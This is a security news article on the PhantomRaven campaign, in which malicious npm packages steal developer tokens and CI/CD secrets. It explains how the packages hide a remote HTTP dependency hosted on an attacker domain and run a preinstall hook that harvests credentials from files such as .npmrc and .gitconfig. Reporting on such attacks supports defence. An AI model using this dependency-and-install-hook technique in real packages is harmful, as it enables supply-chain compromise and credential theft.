A sophisticated malware campaign targeting developers has been operating since August 2025, deploying 126 malicious npm packages that have collectively accumulated over 86,000 downloads.
The attack, now identified as PhantomRaven, has been actively harvesting npm authentication tokens, GitHub credentials, and CI/CD pipeline secrets from developers across the globe while employing advanced detection evasion techniques that bypass most security tools.
Koi analysts identified the campaign in October 2025 when their behavioral monitoring system, Wings, flagged suspicious network activity during package installation processes.
All malicious packages were making external requests to the same suspicious domain, revealing a coordinated operation.
The investigation by Koi researchers uncovered a staggering timeline: 21 packages were initially detected and removed in August 2025, but attackers adapted their approach, successfully deploying 80 additional packages between September and October that evaded detection mechanisms entirely.
The attacker’s infrastructure demonstrates an interesting contrast between sophisticated technical execution and surprisingly careless operational security.
Sequential email accounts from free providers like [email protected] through [email protected], combined with obvious usernames such as npmhell and npmpackagejpd, all clearly trace back to a single threat actor.
Despite this operational sloppiness, the technical delivery mechanism represents a genuine innovation in supply chain attacks.
The malicious packages appeared completely benign when reviewed on npmjs.com, displaying simple hello world scripts with seemingly zero dependencies.
.webp "PhantomRaven Attack Involves 126 Malicious npm Packages with Over 86,000 Downloads Hiding Malicious Code 3")
This illusion was achieved through a technique involving Remote Dynamic Dependencies, where HTTP URLs serve as dependency specifiers rather than traditional npm registry references.
The malicious code resided not in the reviewed package but in an invisible dependency fetched from packages.storeartifact.com at installation time, completely bypassing static analysis and dependency scanning tools.
Remote Dynamic Dependencies Deliver the Payload
Traditional npm dependencies reference packages hosted on npmjs.com using standard version specifiers like "express": "^4.18.0".
However, npm supports an obscure feature allowing HTTP URLs as dependency specifiers, formatted as "ui-styles-pkg": "http://packages.storeartifact.com/ui-styles-pkg.tgz".
When developers install packages containing these remote dependencies, npm automatically fetches the external resources without any security validation or visibility.
Security scanners and automated analysis tools never follow these HTTP-based dependencies, treating packages as having zero dependencies despite the hidden malicious payload.
This creates a perfect blind spot where the reviewed package appears completely safe while the actual malicious code sits on attacker-controlled infrastructure.
The technique becomes even more dangerous because every installation fetches the dependency fresh from the attacker’s server, enabling dynamic payload delivery based on the target environment.
Once the invisible dependency arrives on the victim’s system, npm’s automatic lifecycle script execution ensures the malware activates immediately.
The malicious package.json contains a preinstall script defined as "preinstall": "node index[.]js" that executes automatically without any user prompt or warning.
This script runs regardless of how deeply nested the malicious package sits within the dependency tree, meaning developers who install seemingly legitimate packages can unknowingly trigger PhantomRaven’s execution through transitive dependencies.
After successful installation, PhantomRaven systematically harvests email addresses from environment variables, .gitconfig files, .npmrc configurations, and package.json author fields.
The malware then targets CI/CD credentials including GitHub Actions tokens, GitLab CI credentials, Jenkins authentication, CircleCI tokens, and npm publishing tokens.
Complete system fingerprinting follows, collecting public IP addresses, hostnames, operating system details, Node.js versions, and network configurations to profile victim environments and identify high-value corporate networks versus individual developer machines.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
